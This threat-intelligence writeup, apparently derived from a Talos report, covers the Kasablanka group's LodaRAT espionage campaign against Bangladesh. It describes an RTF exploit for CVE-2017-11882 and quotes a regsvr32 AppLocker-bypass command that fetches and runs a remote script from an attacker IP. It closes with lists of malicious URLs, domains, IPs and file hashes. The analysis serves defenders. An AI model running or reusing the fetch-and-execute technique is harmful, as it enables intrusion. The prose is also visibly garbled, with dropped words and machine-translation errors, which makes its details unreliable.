cyber attack

The Bangladesh campaign – Kasablanka Group’s LodaRAT

Introduction

is linked to a specific campaign against Bangladesh.
Kasablanka (LodaRAT) appears to be motivated by information gathering and espionage rather than direct financial gain.

Talos has identified an activity starting in October 2020. Currently, the activity is still in progress, currently targeting and Android platforms. info.v-pn [.] co was first recorded on July 2, 2020 In order to carry malicious activities, it was used as Loda’s C2, that is, the day the domain was also registered. From this date, this host has been used for Loda-related malicious activities. It has been changed many times in the past seven months Several IPs.

The version uses IP 107.172.30 [.] 213 as the placement site, which hosts the first stage script and main payload.

For this event, malicious participants used the IP address 160.178.220 [.] 194 as the hosting site for the and Android versions in the early stage, and also changed their C2 to info.v-pn [.] co.

Based on the certificate fingerprints used to sign the two Android samples, we believe that C2 was recently changed to info.v-pn[.]co and is currently being distributed from the new domain lap-top[.]xyz.

The development version signed by the same certificate (the internal RFC1918 address uses 192.168.1.169 as C2) has been anonymously submitted to VirusTotal from the same Moroccan geographic area as the IP geographic location used in this IP (160.178.220[.]194). The event The early stages of the show that the developers of Loda4Android may be located in Morocco.

Starting

The attacker uses a malicious RTF document that uses CVE-2017-11882 to download the malicious SCT file.

The files analyzed during this investigation did not have any confusion. The payload of the vulnerability is in plain text format, which can be easily viewed.

lodarat rtf

The second stage of the infection chain transfers the technology previously used by Loda. As shown above, the payload runs the following command:

regsvr32 / s / u / n /i:hxxp://107[.]172[.]30[.]

This is a known technique in that bypasses AppLocker by abusing the regsvr32 command. Using this technique, an attacker can download and execute SCT files while bypassing Applocker.

The malicious SCT file is essentially an XML file containing JavaScript that downloads and executes the Loda binary file.

IOCs

hxxps://lap-top[.]xyz/mobile/Lap-top%20Security_Setup.apk
hxxps://av24[.]co/Virus_Cleaner_Setup.msi
hxxp://bdpolice[.]co/answer-paper-demo.zip
hxxps://isiamibankbd[.]com/tv/TPTUMC.exe
hxxps://bangladesh-bank[.]com/PBVANA.doc
hxxp://bangladesh-bank[.]com/invoice.zip
hxxp://zep0de.com/viewticket.exe
hxxp://bracbank[.]info/munafa[.]php
hxxp://107[.]172[.]30[.]213/Flash.exe


info.v-pn[.]co
lap-top[.]xyz
av24[.]co
bdpolice[.]co
isiamibankbd[.]com
bangladesh-bank[.]com
zep0de.com
Bracbank[.]info


160.178.220[.]194
194.5.98[.]55
107.172.30[.]213


91b6ea9fccb4eae21335588bc83dea09780a5b7e145721f7098baafa2072286a
52b6db0fec7f587505aabfe091d8e0751acd8d4f4d120eeba5519c25a6dd8673
977a9d25972b999ae3b12d12e12978f4d116b5fb713c76c57998be15b4172def
68b221360edf4802b470fbc86493025707cf4913cc15729f4bc6ec149a4dc7ba
59f29819d223e47099ca0f00fd6bc4335d7b95188d623bf0c78c8e594c0c69c7
fbb8a86f399491ea5633df62f66bec1e4d4d5531f1dff976da1a3091b8ea4f34
4fa5525008128f77562fbb64af82b2fbcbc6c0afe71d567470380dc4476184a9
c3afaf555eabe5e40dcb87d2c292491e561b2dadcb1998f508088ba3bcac6836
677db7d296e4bea770f99f34e70be72b8a2b910b661804592202f3a4834ef102
4f319b2518d855803e678713cf4b6cae975ebdd60cc1174f1609bbb9ea76f007
01f44cdc139eca65f02bfe1a8918a0d073e89bc19350262dc9d10a564863fdfd
7a55844f86b49e103564750a37604954590d27686f7f7bc8e5ae6101e8e18424
ce2276bbb6423015a4f2e80f320e068b8f53f7c19a43fb0a6f9aa5784e716d6e
bf6f5a2730ced754907e277b590959d9c734681a07a466112c392e92d008fea3
634dd186ff28247da22a9c638a117f757ba4baae
cbbcef863a6e7865027ff358cf1a6dcdeaad0d36
c01ae69b433269bcc2fd30d2b9c8576041263ce9
9bcd9a33c051d36ab0acec41e37d394025982822
f8ea2215496e6ead5135cf0ff4936cdb11208c37
acdc857fc24b72927b550e365eb4d77f385b6a4d
0239655de78351669cb0d351accb9dbe858b4347
0d1ae8971ec43ba43cc58ee7d3e22ffa3ad278b2
78a5dbe3c8cd70f514d1854013c30d56240e34ad
e7d5f4dc247270747a170bf6b3575f8523b5520c
af45e8a08dc3666996223dc4794bbdf9beff6bec
99ee00c87c5631c1d70610f42951b3acf54b4a20
dad1cb6cf834896d90f4eda7ee7d2910bd762841
3e1b9638427c9a11ad6bc55a58f876a44c0e4bf5
6cfc723111d7001f8c14f0cd397dbd44
c39fc85c03b20e888abbd13678f9efe7
9b6b7f85c64ca54c9f755554d5af5a47
c7dfd9ada76552be7d8a566f39066702
9a0f72cdc9a2846da937676e1efe8bf4
90387cfd4c6ebfd992e383d6d66bf458
35a3319dcba68678d4e94c039780d4c1
afcc83d0b6bb0e71d04fb54db253a9d9
50ee8d6a24c1e29d184ecec1eb205ecf
ec8d1d6562a210daac931879acbca7c4
8c8b50499149c2ad20ba39a3a607423c
461e4b3868aede5b44578441ed352268
01ee65abddc83d85f56e646a77abdf81
09600ffd3bbfad0e397b2c4bf04037c5